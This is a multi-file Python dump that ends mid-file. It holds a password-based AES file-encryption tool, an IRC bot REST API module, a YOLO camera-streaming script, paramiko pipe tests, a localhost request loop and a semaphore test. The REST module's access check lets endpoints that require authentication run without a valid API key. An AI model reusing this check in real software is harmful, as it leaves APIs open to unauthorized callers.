Pad to the boundary using a byte value that indicates
the number of padded bytes to make it easy to unpad
later.
@param text The text to pad.
'''
num_bytes = size - (len(text) % size)
# Works for python3 and python2.
if isinstance(text, str):
text += chr(num_bytes) * num_bytes
elif isinstance(text, bytes):
text += bytearray([num_bytes] * num_bytes)
else:
assert False
return text
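# Worked example (illustrative values): _pkcs7_pad(b'abc', 8) returns
# b'abc\x05\x05\x05\x05\x05' and _pkcs7_unpad() of that value returns b'abc';
# input whose length is already a multiple of the block size gains a full
# block of padding.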
def _pkcs7_unpad(self, padded):
'''
PKCS#7 unpadding.
We padded with the number of characters to unpad.
Just get it and truncate the string.
Works for python 2/3.
'''
if isinstance(padded, str):
unpadded_len = ord(padded[-1])
elif isinstance(padded, bytes):
unpadded_len = padded[-1]
else:
assert False
return padded[:-unpadded_len]
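# A minimal usage sketch of AESCipher for in-memory data, assuming the
# default (non-openssl) mode and the cryptography package installed.
# The password and plaintext below are made up for illustration; nothing
# in this tool calls the helper.
def _aescipher_roundtrip_example():
    cipher = AESCipher()                                 # non-openssl mode
    token = cipher.encrypt('secret', b'attack at dawn')  # base64-encoded bytes
    plain = cipher.decrypt('secret', token)              # original bytes back
    assert plain == b'attack at dawn'
    return plain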
# ================================================================
#
# Message Utility Functions.
#
# ================================================================
def _msg(prefix, msg, level, ofp):
'''
Thread safe message reporting.
'''
th_mutex.acquire()
try:
ofp.write('{}:{} {}\n'.format(prefix, inspect.stack()[level][2], msg))
finally:
th_mutex.release()
def info(msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information.
'''
_msg('INFO', msg, level+1, ofp)
def infov(opts, msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information if verbose mode is enabled.
'''
if opts.verbose:
_msg('INFO', msg, level+1, ofp)
def infov2(opts, msg, level=1, ofp=sys.stdout):
'''
Display a simple information message with context information if the verbosity level is greater than 1.
'''
if opts.verbose > 1:
_msg('INFO', msg, level+1, ofp)
def err(msg, level=1, ofp=sys.stdout):
'''
Display error message with context information and exit.
'''
_msg('ERROR', msg, level+1, ofp)
abort_threads()
sys.exit(1)
def errn(msg, level=1, ofp=sys.stdout):
'''
Display error message with context information but do not exit.
'''
_msg('ERROR', msg, level+1, ofp)
def warn(msg, level=1, ofp=sys.stdout):
'''
Display a warning message with context information but do not exit.
'''
_msg('WARNING', msg, level+1, ofp)
def _println(msg, ofp=sys.stdout):
'''
Print a message with a new line.
'''
th_mutex.acquire()
try:
ofp.write(msg + '\n')
finally:
th_mutex.release()
# ================================================================
#
# Thread utility functions.
#
# ================================================================
def abort_threads():
'''
Set the abort flag.
'''
th_mutex.acquire()
try:
global th_abort
th_abort = True
finally:
th_mutex.release()
def get_num_cores():
'''
Get the number of available cores.
Unfortunately, multiprocessing.cpu_count() uses _NPROCESSORS_ONLN,
which may be different from the actual number of cores available
if power saving mode is enabled.
On Linux and Mac we can use "getconf _NPROCESSORS_CONF"; I have
no idea how to get it on Windows, maybe some WMIC call.
'''
if os.name == 'posix':
# should be able to run getconf.
try:
out = subprocess.check_output('getconf _NPROCESSORS_CONF', stderr=subprocess.STDOUT, shell=True)
return int(out.strip())
except subprocess.CalledProcessError as exc:
err('command failed: {}'.format(exc))
return multiprocessing.cpu_count()
def thread_process_file(opts, password, entry, stats):
'''
Thread worker.
Waits for the semaphore to make a slot available, then
runs the specified function.
'''
if th_abort is False:
with th_semaphore:
process_file(opts, password, entry, stats)
def wait_for_threads():
'''
Wait for threads to complete.
'''
for th in threading.enumerate():
if th == threading.currentThread():
continue
th.join()
# ================================================================
#
# Program specific functions.
#
# ================================================================
def get_err_fct(opts):
'''
Get the message function: error or warning depending on
the --warn setting.
'''
if opts.warn is True:
return warn
return err
def stat_inc(stats, key, value=1):
'''
Increment the stat in a synchronous way using a mutex
to coordinate between threads.
'''
th_mutex.acquire()
try:
stats[key] += value
finally: # avoid deadlock from exception
th_mutex.release()
def check_existence(opts, path):
'''
Check to see if a file exists.
If -o or --overwrite is specified, we don't care if it exists.
'''
if opts.overwrite is False and os.path.exists(path):
get_err_fct(opts)('file exists, cannot continue: {}'.format(path))
def read_file(opts, path, stats):
'''
Read the file contents.
'''
try:
with open(path, 'rb') as ifp:
data = ifp.read()
stat_inc(stats, 'read', len(data))
return data
except IOError as exc:
get_err_fct(opts)('failed to read file "{}": {}'.format(path, exc))
return None
def write_file(opts, path, content, stats, width=0):
'''
Write the file.
'''
try:
with open(path, 'wb') as ofp:
if width < 1:
ofp.write(content)
else:
i = 0
nl = '\n' if isinstance(content, str) else b'\n'
while i < len(content):
ofp.write(content[i:i+width] + nl)
i += width
stat_inc(stats, 'written', len(content))
except IOError as exc:
get_err_fct(opts)('failed to write file "{}": {}'.format(path, exc))
return False
return True
def lock_file(opts, password, path, stats):
'''
Lock a file.
'''
out = path + opts.suffix
infov2(opts, 'lock "{}" --> "{}"'.format(path, out))
check_existence(opts, out)
content = read_file(opts, path, stats)
if content is not None:
data = AESCipher(openssl=opts.openssl).encrypt(password, content)
if data is not None and write_file(opts, out, data, stats, width=opts.wll) is True and th_abort is False:
if out != path:
os.remove(path) # remove the input
stat_inc(stats, 'locked')
def unlock_file(opts, password, path, stats):
'''
Unlock a file.
'''
if path.endswith(opts.suffix):
if len(opts.suffix) > 0:
out = path[:-len(opts.suffix)]
else:
out = path
infov2(opts, 'unlock "{}" --> "{}"'.format(path, out))
check_existence(opts, out)
content = read_file(opts, path, stats)
if content is not None and th_abort is False:
try:
data = AESCipher(openssl=opts.openssl).decrypt(password, content)
if write_file(opts, out, data, stats) is True:
if out != path:
os.remove(path) # remove the input
stats['unlocked'] += 1
except ValueError as exc:
get_err_fct(opts)('unlock/decrypt operation failed for "{}": {}'.format(path, exc))
else:
infov2(opts, 'skip "{}"'.format(path))
stats['skipped'] += 1
def process_file(opts, password, path, stats):
'''
Process a file.
'''
if th_abort is False:
stat_inc(stats, 'files')
if opts.lock is True:
lock_file(opts, password, path, stats)
else:
unlock_file(opts, password, path, stats)
def process_dir(opts, password, path, stats):
'''
Process a directory, we always start at the top level.
'''
stats['dirs'] += 1
if opts.recurse is True:
# Recurse to get everything.
for root, subdirs, subfiles in os.walk(path):
for subfile in sorted(subfiles, key=str.lower):
if subfile.startswith('.'):
continue
if th_abort is True:
break
subpath = os.path.join(root, subfile)
th = Thread(target=thread_process_file, args=(opts, password, subpath, stats))
th.daemon = True
th.start()
else:
# Use listdir() to get the files in the current directory only.
for entry in sorted(os.listdir(path), key=str.lower):
if entry.startswith('.'):
continue
subpath = os.path.join(path, entry)
if os.path.isfile(subpath):
if th_abort is True:
break
th = Thread(target=thread_process_file, args=(opts, password, subpath, stats))
th.daemon = True
th.start()
def process(opts, password, entry, stats):
'''
Process an entry.
If it is a file, then operate on it.
If it is a directory, recurse if --recurse was specified.
'''
if th_abort is False:
if os.path.isfile(entry):
th = Thread(target=thread_process_file, args=(opts, password, entry, stats))
th.daemon = True
th.start()
elif os.path.isdir(entry):
process_dir(opts, password, entry, stats)
def run(opts, password, stats):
'''
Process the entries on the command line.
They can be either files or directories.
'''
for entry in opts.FILES:
process(opts, password, entry, stats)
def summary(opts, stats):
'''
Print the summary statistics after all threads
have completed.
'''
if opts.verbose:
action = 'lock' if opts.lock is True else 'unlock'
print('')
print('Setup')
print(' action: {:>12}'.format(action))
print(' inplace: {:>12}'.format(str(opts.inplace)))
print(' jobs: {:>12,}'.format(opts.jobs))
print(' overwrite: {:>12}'.format(str(opts.overwrite)))
print(' suffix: {:>12}'.format('"' + opts.suffix + '"'))
print('')
print('Summary')
print(' total files: {:>12,}'.format(stats['files']))
if opts.lock:
print(' total locked: {:>12,}'.format(stats['locked']))
if opts.unlock:
print(' total unlocked: {:>12,}'.format(stats['unlocked']))
print(' total skipped: {:>12,}'.format(stats['skipped']))
print(' total bytes read: {:>12,}'.format(stats['read']))
print(' total bytes written: {:>12,}'.format(stats['written']))
print('')
def get_password(opts):
'''
Get the password.
If the user specified -P or --password on the command line, use
that.
If the user specified -p <file> or --password-file <file> on the
command line, read the first line of the file that is not blank and
does not start with #.
If neither of the above, prompt the user twice.
'''
# User specified it on the command line. Not safe but useful for testing
# and for scripts.
if opts.password:
return opts.password
# User specified the password in a file. It should be 0600.
if opts.password_file:
if not os.path.exists(opts.password_file):
err("password file doesn't exist: {}".format(opts.password_file))
password = None
ifp = open(opts.password_file, 'r')  # text mode so lines compare as str
for line in ifp.readlines():
line = line.strip()  # leading and trailing white space not allowed
if len(line) == 0:
continue # skip blank lines
if line[0] == '#':
continue # skip comments
password = line
break
ifp.close()
if password is None:
err('password was not found in file ' + opts.password_file)
return password
# User did not specify a password, prompt twice to make sure that
# the password is specified correctly.
password = getpass.getpass('Password: ')
password2 = getpass.getpass('Re-enter password: ')
if password != password2:
err('passwords did not match!')
return password
def getopts():
'''
Get the command line options.
'''
def gettext(s):
lookup = {
'usage: ': 'USAGE:',
'positional arguments': 'POSITIONAL ARGUMENTS',
'optional arguments': 'OPTIONAL ARGUMENTS',
'show this help message and exit': 'Show this help message and exit.\n ',
}
return lookup.get(s, s)
argparse._ = gettext # to capitalize help headers
base = os.path.basename(sys.argv[0])
name = os.path.splitext(base)[0]
usage = '\n {0} [OPTIONS] [<FILES_OR_DIRS>]+'.format(base)
desc = 'DESCRIPTION:{0}'.format('\n '.join(__doc__.split('\n')))
epilog = r'''EXAMPLES:
# Example 1: help
$ {0} -h
# Example 2: lock/unlock a single file
$ {0} -P 'secret' file.txt
$ ls file.txt*
file.txt.locked
$ {0} -P 'secret' --unlock file.txt.locked
$ ls -1 file.txt*
file.txt
# Example 3: lock/unlock a set of directories
$ {0} -P 'secret' project1 project2
$ find project1 project2 -type f -name '*.locked'
<output snipped>
$ {0} -P 'secret' --unlock project1 project2
# Example 4: lock/unlock using a custom extension
$ {0} -P 'secret' -s .EncRypt file.txt
$ ls file.txt*
file.txt.EncRypt
$ {0} -P 'secret' -s .EncRypt --unlock file.txt.EncRypt
# Example 5: lock/unlock a file in place (using the same name)
# The file name does not change but the content.
# It is compatible with the default mode of operation in
# previous releases.
# This mode of operation is not recommended because data
# will be lost if the disk fills up during a write.
$ {0} -P 'secret' -i -l file.txt
$ ls file.txt*
file.txt
$ {0} -P 'secret' -i -u file.txt
$ ls file.txt*
file.txt
# Example 6: use a password file.
$ echo 'secret' >pass.txt
$ chmod 0600 pass.txt
$ {0} -p pass.txt -l file.txt
$ {0} -p pass.txt -u file.txt.locked
# Example 7: encrypt and decrypt in an openssl compatible manner
# by specifying the compatibility (-c) option.
$ echo 'secret' >pass.txt
$ chmod 0600 pass.txt
$ {0} -p pass.txt -c -l file.txt
$ # Dump the locked password file contents, then decrypt it.
$ openssl enc -aes-256-cbc -d -a -salt -pass file:pass.txt -in file.txt.locked
$ {0} -p pass.txt -c -u file.txt.locked
COPYRIGHT:
Copyright (c) 2015 Joe Linoff, all rights reserved
LICENSE:
MIT Open Source
PROJECT:
https://github.com/jlinoff/lock_files
'''.format(base)
afc = argparse.RawTextHelpFormatter
parser = argparse.ArgumentParser(formatter_class=afc,
description=desc[:-2],
usage=usage,
epilog=epilog)
group1 = parser.add_mutually_exclusive_group()
parser.add_argument('-c', '--openssl',
action='store_true',
help='''Enable openssl compatibility.
This will encrypt and decrypt in a manner
that is completely compatible with openssl.
This option must be specified for both
encrypt and decrypt operations.
These two encrypt commands are equivalent.
$ openssl enc -aes-256-cbc -e -a -salt -pass pass:PASSWORD -in FILE -out FILE.locked
$ {0} -P PASSWORD -l FILE
These two decrypt commands are equivalent.
$ openssl enc -aes-256-cbc -d -a -salt -pass pass:PASSWORD -in FILE.locked -out FILE
$ {0} -P PASSWORD -u FILE.locked
'''.format(base))
parser.add_argument('-d', '--decrypt',
action='store_true',
help='''Unlock/decrypt files.
This option is deprecated.
It is the same as --unlock.
''')
parser.add_argument('-e', '--encrypt',
action='store_true',
help='''Lock/encrypt files.
This option is deprecated.
This is the same as --lock and is the default.
''')
parser.add_argument('-i', '--inplace',
action='store_true',
help='''In place mode.
Overwrite files in place.
It is the same as specifying:
-o -s ''
This is dangerous because a disk-full
condition can cause data to be lost when a
write fails. This allows you to duplicate the
behavior of the previous version.
''')
#nc = get_num_cores()
parser.add_argument('-j', '--jobs',
action='store',
type=int,
default=1,
metavar=('NUM_THREADS'),
help='''Specify the maximum number of active threads.
This can be helpful if there are a lot of large
files to process where large refers to files
larger than a MB.
Default: %(default)s
''')
parser.add_argument('-l', '--lock',
action='store_true',
help='''Lock files.
Files are locked and the ".locked" extension
is appended unless the --suffix option is
specified.
''')
parser.add_argument('-o', '--overwrite',
action='store_true',
help='''Overwrite files that already exist.
This can be used to disable the file
existence checks.
It is used by the --inplace mode.
''')
group1.add_argument('-p', '--password-file',
action='store',
type=str,
help='''file that contains the password.
The default behavior is to prompt for the
password.
''')
group1.add_argument('-P', '--password',
action='store',
type=str,
help='''Specify the password on the command line.
This is not secure because it is visible in
the command history.
''')
parser.add_argument('-r', '--recurse',
action='store_true',
help='''Recurse into subdirectories.
''')
parser.add_argument('-s', '--suffix',
action='store',
type=str,
default='.locked',
metavar=('EXTENSION'),
help='''Specify the extension used for locked files.
Default: %(default)s
''')
parser.add_argument('-u', '--unlock',
action='store_true',
help='''Unlock files.
Files with the ".locked" extension are
unlocked.
If the --suffix option is specified, that
extension is used instead of ".locked".
''')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='''Increase the level of verbosity.
A single -v generates a summary report.
Two or more -v options show all of the files
being processed.
''')
# Display the version number and exit.
parser.add_argument('-V', '--version',
action='version',
version='%(prog)s version {0}'.format(VERSION),
help="""Show program's version number and exit.
""")
parser.add_argument('-w', '--wll',
action='store',
type=int,
default=72,
metavar=('INTEGER'),
help='''The width of each locked/encrypted line.
This is important because text files with
very, very long lines can sometimes cause problems
during uploads. If set to zero, no new lines
are inserted.
Default: %(default)s
''')
parser.add_argument('-W', '--warn',
action='store_true',
help='''Warn if a single file lock/unlock fails.
Normally if the program tries to modify a
file and that modification fails, an error is
reported and the program stops. This option
causes that event to be treated as a warning
so the program continues.
''')
# Positional arguments at the end.
parser.add_argument('FILES',
nargs="*",
help='files to process')
opts = parser.parse_args()
# Make lock and unlock authoritative.
if opts.decrypt is True:
opts.unlock = True
if opts.encrypt is True:
opts.lock = True
if opts.lock is True and opts.unlock is True:
err('You have specified mutually exclusive options to lock/encrypt and unlock/decrypt.')
if opts.lock is False and opts.unlock is False:
opts.lock = True # the default
if opts.inplace:
opts.suffix = ''
opts.overwrite = True
elif opts.overwrite == True and opts.suffix == '':
opts.inplace = True
return opts
def main():
'''
main
'''
opts = getopts()
password = get_password(opts)
stats = {
'locked': 0,
'unlocked': 0,
'skipped': 0,
'files': 0,
'dirs': 0,
'read': 0,
'written': 0,
}
# Use the mutex for I/O to avoid interspersed output.
# Use the semaphore to limit the number of active threads.
global th_semaphore
th_semaphore = Semaphore(opts.jobs)
try:
run(opts, password, stats)
wait_for_threads()
except KeyboardInterrupt:
abort_threads()
_println('', sys.stderr)
errn('^C detected, cleaning up threads, please wait\n')
wait_for_threads()
summary(opts, stats)
if th_abort == True:
sys.exit(1)
if __name__ == '__main__':
main()
|
rest_api.py
|
# --depends-on commands
# --depends-on config
# --depends-on permissions
import binascii
import http.server
import json
import os
import socket
import threading
import urllib.parse
from src import ModuleManager, utils
from src.Logging import Logger as log
DEFAULT_PORT = 5001
DEFAULT_PUBLIC_PORT = 5000
class Response(object):
def __init__(self, compact=False):
self._compact = compact
self._headers = {}
self._data = b""
self.code = 200
self.content_type = "text/plain"
def write(self, data):
self._data += data
def write_text(self, data):
self._data += data.encode("utf8")
def write_json(self, obj):
if self._compact:
data = json.dumps(obj, separators=(",", ":"))
else:
data = json.dumps(obj, sort_keys=True, indent=4)
self._data += data.encode("utf8")
def set_header(self, key: str, value: str):
self._headers[key] = value
def get_headers(self):
headers = {}
has_content_type = False
for key, value in self._headers.items():
if key.lower() == "content-type":
has_content_type = True
headers[key] = value
if not has_content_type:
headers["Content-Type"] = self.content_type
headers["Content-Length"] = len(self._data)
return headers
def get_data(self):
return self._data
_module = None
_bot = None
_events = None
_log = None
class Handler(http.server.BaseHTTPRequestHandler):
timeout = 10
def _path_data(self):
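# Example (hypothetical request): "/api/channels/freenode?key=abc" yields
# path="/api/channels/freenode", endpoint="channels", args=["freenode"];
# the leading route segment ("api") is discarded and the query string is
# handled separately by _url_params().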
path = urllib.parse.urlparse(self.path).path
_, _, endpoint = path[1:].partition("/")
endpoint, _, args = endpoint.partition("/")
args = list(filter(None, args.split("/")))
return path, endpoint, args
def _url_params(self):
parsed = urllib.parse.urlparse(self.path)
query = urllib.parse.parse_qs(parsed.query)
return dict([(k, v[0]) for k, v in query.items()])
def _body(self):
content_length = int(self.headers.get("content-length", 0))
return self.rfile.read(content_length)
def _respond(self, response):
self.send_response(response.code)
for key, value in response.get_headers().items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(response.get_data())
def _key_settings(self, key):
return _bot.get_setting("api-key-%s" % key, {})
def _minify_setting(self):
return _bot.get_setting("rest-api-minify", False)
def _url_for(self, headers):
return lambda route, endpoint, args=[], get_params={}: _module._url_for(
route, endpoint, args, get_params, headers.get("Host", None)
)
def _handle(self, method, path, endpoint, args):
headers = utils.CaseInsensitiveDict(dict(self.headers.items()))
params = self._url_params()
data = self._body()
response = Response(compact=self._minify_setting())
response.code = 404
hooks = _events.on("api").on(method).on(endpoint).get_hooks()
if hooks:
response.code = 200
hook = hooks[0]
authenticated = hook.get_kwarg("authenticated", True)
key = params.get("key", None)
key_setting = self._key_settings(key)
permissions = key_setting.get("permissions", [])
if key_setting:
log.debug(
"[HTTP] %s to %s with API key %s (%s)"
% (method, path, key, key_setting["comment"])
)
event_response = None
if authenticated is True or path in permissions or "*" in permissions:
event_response = (
_events.on("api")
.on(method)
.on(endpoint)
.call_for_result_unsafe(
params=params,
args=args,
data=data,
headers=headers,
response=response,
url_for=self._url_for(headers),
)
)
"""except Exception as e:
log.error("failed to call API endpoint \"%s\"" % (path))
response.code = 500"""
if event_response != None:
response.write_json(event_response)
response.content_type = "application/json"
else:
response.code = 401
return response
def _handle_wrap(self, method):
path, endpoint, args = self._path_data()
log.debug(
"[HTTP] starting _handle for %s from %s:%d: %s"
% (method, self.client_address[0], self.client_address[1], path)
)
response = _bot.trigger(
lambda: self._handle(method, path, endpoint, args))
self._respond(response)
log.debug(
"[HTTP] finishing _handle for %s from %s:%d (%d)"
% (method, self.client_address[0], self.client_address[1], response.code)
)
def do_GET(self):
self._handle_wrap("GET")
def do_POST(self):
self._handle_wrap("POST")
def log_message(self, format, *args):
return
class MagicBotIPv6HTTPd(http.server.HTTPServer):
address_family = socket.AF_INET6
@utils.export("botset", utils.BoolSetting("rest-api", "Enable/disable REST API"))
@utils.export(
"botset", utils.BoolSetting(
"rest-api-minify", "Enable/disable REST API minifying")
)
@utils.export(
"botset", utils.Setting(
"rest-api-host", "Public hostname:port for the REST API")
)
class Module(ModuleManager.BaseModule):
_name = "REST"
def on_load(self):
global _module
_module = self
global _bot
_bot = self.bot
global _events
_events = self.events
self.httpd = None
if self.bot.get_setting("rest-api", False):
self._start_httpd()
def _start_httpd(self):
port = int(self.bot.config.get("api-port", str(DEFAULT_PORT)))
self.httpd = MagicBotIPv6HTTPd(("::1", port), Handler)
self.thread = threading.Thread(target=self.httpd.serve_forever)
self.thread.daemon = True
self.thread.start()
@utils.hook("received.command.apishutdown")
def _stop_httpd(self, event):
if self.httpd:
self.httpd.shutdown()
def on_resume(self):
self._start_httpd()
def unload(self):
self._stop_httpd()
def on_pause(self):
self._stop_httpd()
@utils.hook("received.command.apikey")
@utils.kwarg("private_only", True)
@utils.spec("!'list ?<alias>wordlower")
@utils.spec("!'add !<alias>wordlower ?<endpoints>words")
@utils.spec("!'remove !<alias>wordlower")
@utils.kwarg("permission", "apikey")
def apikey(self, event):
subcommand = event["spec"][0]
alias = event["spec"][1]
found = None
api_keys = {}
for key, value in self.bot.find_settings(prefix="api-key-"):
api_keys[key] = value
if alias and value["comment"].lower() == alias:
found = key
if subcommand == "list":
aliases = {v["comment"]: v for v in api_keys.values()}
if alias:
if not alias in aliases:
event["stderr"].write("API key '%s' not found" % alias)
event["stdout"].write(
"API key %s ('%s') can access: %s"
% (key, alias, " ".join(aliases[alias]["permissions"]))
)
else:
event["stdout"].write(
"API keys: %s" % ", ".join(sorted(aliases.keys()))
)
elif subcommand == "add":
if found == None:
new_key = binascii.hexlify(os.urandom(16)).decode("ascii")
self.bot.set_setting(
"api-key-%s" % new_key,
{"comment": alias, "permissions": event["spec"][2] or []},
)
event["stdout"].write(
"New API key '%s': %s" % (alias, new_key))
else:
event["stderr"].write(
"API key alias '%s' already exists" % alias)
elif subcommand == "remove":
if not len(event["args_split"]) > 1:
raise utils.EventError("Please provide a key alias to remove")
if not found == None:
self.bot.del_setting(found)
key = found.replace("api-key-", "", 1)
event["stdout"].write(
"Deleted API key %s ('%s')" % (key, alias))
else:
event["stderr"].write("Count not find API key '%s'" % alias)
@utils.export("url-for")
def _url_for(self, route, endpoint, args=[], get_params={}, host_override=None):
host = host_override or self.bot.get_setting("rest-api-host", None)
host, _, port = host.partition(":")
if not port:
port = str(_bot.config.get("api-port", DEFAULT_PUBLIC_PORT))
host = "%s:%s" % (host, port)
if host:
args_str = ""
if args:
args_str = "/%s" % "/".join(args)
get_params_str = ""
if get_params:
get_params_str = "?%s" % urllib.parse.urlencode(get_params)
return "%s/%s/%s%s%s" % (host, route, endpoint, args_str, get_params_str)
else:
return None
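# Usage sketch (hypothetical values): with "rest-api-host" set to
# "example.com:5000", _url_for("api", "channels", ["freenode"], {"key": "abc"})
# returns "example.com:5000/api/channels/freenode?key=abc"; when the setting
# carries no port, the public api-port from the bot config is appended.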
|
detection_custom.py
|
# ================================================================
#
# File name : detection_custom.py
# Author : PyLessons
# Created date: 2020-09-17
# Website : https://pylessons.com/
# GitHub : https://github.com/pythonlessons/TensorFlow-2.x-YOLOv3
# Description : object detection image and video example
#
# ================================================================
import os
import io
import logging
import socketserver
from threading import Condition
import threading
from http import server
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from yolov3.utils import detect_realtime, Load_Yolo_model
from yolov3.configs import *
PAGE = """\
<html>
<head>
<title>Raspberry Pi - Camera</title>
</head>
<body>
<center><h1>Raspberry Pi - Camera</h1></center>
<center><img src="stream.mjpg" width="640" height="480"></center>
</body>
</html>
"""
class StreamingOutput(object):
def __init__(self):
self.frame = None
self.buffer = io.BytesIO()
self.condition = Condition()
def write(self, buf):
if buf.startswith(b'\xff\xd8'):
# New frame, copy the existing buffer's content and notify all
# clients it's available
self.buffer.truncate()
with self.condition:
self.frame = self.buffer.getvalue()
self.condition.notify_all()
self.buffer.seek(0)
return self.buffer.write(buf)
class StreamingHandler(server.BaseHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
elif self.path == '/index.html':
content = PAGE.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(content)))
self.end_headers()
self.wfile.write(content)
elif self.path == '/capture':
pass
# capture()
elif self.path == '/stream.mjpg':
self.send_response(200)
self.send_header('Age', 0)
self.send_header('Cache-Control', 'no-cache, private')
self.send_header('Pragma', 'no-cache')
self.send_header('Content-Type', 'multipart/x-mixed-replace; boundary=FRAME')
self.end_headers()
try:
while True:
with output.condition:
output.condition.wait()
frame = output.frame
self.wfile.write(b'--FRAME\r\n')
self.send_header('Content-Type', 'image/jpeg')
self.send_header('Content-Length', str(len(frame)))
self.end_headers()
self.wfile.write(frame)
self.wfile.write(b'\r\n')
except Exception as e:
logging.warning(
'Removed streaming client %s: %s',
self.client_address, str(e))
else:
self.send_error(404)
self.end_headers()
class StreamingServer(socketserver.ThreadingMixIn, server.HTTPServer):
allow_reuse_address = True
daemon_threads = True
def stream():
address = ('192.168.15.1', 8000)
s = StreamingServer(address, StreamingHandler)
s.serve_forever()
output = StreamingOutput()
threading.Thread(target=stream, daemon=True).start()
yolo = Load_Yolo_model()
detect_realtime(yolo, output=output, input_size=YOLO_INPUT_SIZE, show=False, CLASSES=TRAIN_CLASSES,
rectangle_colors=(255, 0, 0))
|
test_buffered_pipe.py
|
# Copyright (C) 2006-2007 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
Some unit tests for BufferedPipe.
"""
import threading
import time
import unittest
from paramiko.buffered_pipe import BufferedPipe, PipeTimeout
from paramiko import pipe
from paramiko.py3compat import b
def delay_thread(p):
p.feed("a")
time.sleep(0.5)
p.feed("b")
p.close()
def close_thread(p):
time.sleep(0.2)
p.close()
class BufferedPipeTest(unittest.TestCase):
def test_1_buffered_pipe(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
p.feed("hello.")
self.assertTrue(p.read_ready())
data = p.read(6)
self.assertEqual(b"hello.", data)
p.feed("plus/minus")
self.assertEqual(b"plu", p.read(3))
self.assertEqual(b"s/m", p.read(3))
self.assertEqual(b"inus", p.read(4))
p.close()
self.assertTrue(not p.read_ready())
self.assertEqual(b"", p.read(1))
def test_2_delay(self):
p = BufferedPipe()
self.assertTrue(not p.read_ready())
threading.Thread(target=delay_thread, args=(p,)).start()
self.assertEqual(b"a", p.read(1, 0.1))
try:
p.read(1, 0.1)
self.assertTrue(False)
except PipeTimeout:
pass
self.assertEqual(b"b", p.read(1, 1.0))
self.assertEqual(b"", p.read(1))
def test_3_close_while_reading(self):
p = BufferedPipe()
threading.Thread(target=close_thread, args=(p,)).start()
data = p.read(1, 1.0)
self.assertEqual(b"", data)
def test_4_or_pipe(self):
p = pipe.make_pipe()
p1, p2 = pipe.make_or_pipe(p)
self.assertFalse(p._set)
p1.set()
self.assertTrue(p._set)
p2.set()
self.assertTrue(p._set)
p1.clear()
self.assertTrue(p._set)
p2.clear()
self.assertFalse(p._set)
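# Illustrative sketch (not paramiko code): a minimal pipe with the same
# feed/read/close behaviour the tests above exercise, showing how a blocking
# read with a timeout can be built on threading.Condition. TinyPipe and the
# TimeoutError it raises are stand-ins, not BufferedPipe/PipeTimeout.
import threading

class TinyPipe:
    def __init__(self):
        self._buffer = bytearray()
        self._closed = False
        self._cv = threading.Condition()

    def feed(self, data):
        with self._cv:
            self._buffer.extend(data.encode() if isinstance(data, str) else data)
            self._cv.notify_all()

    def close(self):
        with self._cv:
            self._closed = True
            self._cv.notify_all()

    def read_ready(self):
        with self._cv:
            return len(self._buffer) > 0

    def read(self, nbytes, timeout=None):
        with self._cv:
            if not self._buffer and not self._closed:
                notified = self._cv.wait(timeout)
                if not notified and not self._buffer and not self._closed:
                    raise TimeoutError('no data within %r seconds' % timeout)
            data = bytes(self._buffer[:nbytes])
            del self._buffer[:nbytes]
            return data            # b'' once the pipe is closed and drained

if __name__ == '__main__':
    p = TinyPipe()
    p.feed('hello.')
    assert p.read(6) == b'hello.'
    p.close()
    assert p.read(1) == b''
    print('TinyPipe behaves the way the tests above expect')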
|
test.py
|
#!/usr/bin/env python
import urllib2
from threading import Thread
URL = 'http://localhost:8001'
class SiteRequest:
def __init__(self, x=10, suffixName='', tables=[]):
self.__x = x
self.__tables = tables
self.__suffixName = suffixName
def hit(self, hitCount):
for i in range(hitCount):
for table in self.__tables:
pt = urllib2.urlopen(URL + '/' + self.__suffixName + '/' + table)
print(pt.read())
theBearArgs = (1, 'thebear', ['songHandler', 'entryHandler', 'playTimeHandler'])
gcsArgs = (1, 'gcs', ['imageHandler', 'markerHandler'])
argList = [theBearArgs, gcsArgs]
def main():
for i in argList:
th = Thread(target=lambda *args : SiteRequest(*args).hit(40000), args=i)
th.start()
if __name__ == '__main__':
main()
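# Illustrative sketch (not part of the script above): the same fan-out idea in
# Python 3, where urllib2 is replaced by urllib.request. The URL, handler
# names and hit count are carried over from the file above.
from threading import Thread
from urllib.request import urlopen

URL = 'http://localhost:8001'

def hit(suffix, tables, count):
    # Sequentially hit every table handler under the given suffix.
    for _ in range(count):
        for table in tables:
            with urlopen('{}/{}/{}'.format(URL, suffix, table)) as resp:
                print(resp.read())

def main():
    jobs = [
        ('thebear', ['songHandler', 'entryHandler', 'playTimeHandler']),
        ('gcs', ['imageHandler', 'markerHandler']),
    ]
    threads = [Thread(target=hit, args=(suffix, tables, 40000))
               for suffix, tables in jobs]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

if __name__ == '__main__':
    main()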
|
test_semlock.py
|
from _multiprocessing import SemLock
from threading import Thread
import thread
import time
def test_notify_all():
"""A low-level variation on test_notify_all() in lib-python's
test_multiprocessing.py
"""
N_THREADS = 1000
lock = SemLock(0, 1, 1)
results = []
def f(n):
if lock.acquire(timeout=5.):
results.append(n)
lock.release()
threads = [Thread(target=f, args=(i,)) for i in range(N_THREADS)]
n_started = N_THREADS
with lock:
for t in threads:
try:
t.start()
except thread.error:
# too many threads for this system
t.started = False
n_started -= 1
else:
t.started = True
time.sleep(0.1)
for t in threads:
if t.started:
t.join()
assert len(results) == n_started
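# Illustrative sketch (not part of the test above): the same hold-then-release
# pattern written against the high-level threading.Semaphore instead of the
# low-level _multiprocessing.SemLock, with a small thread count so it runs
# anywhere without hitting thread limits.
import threading

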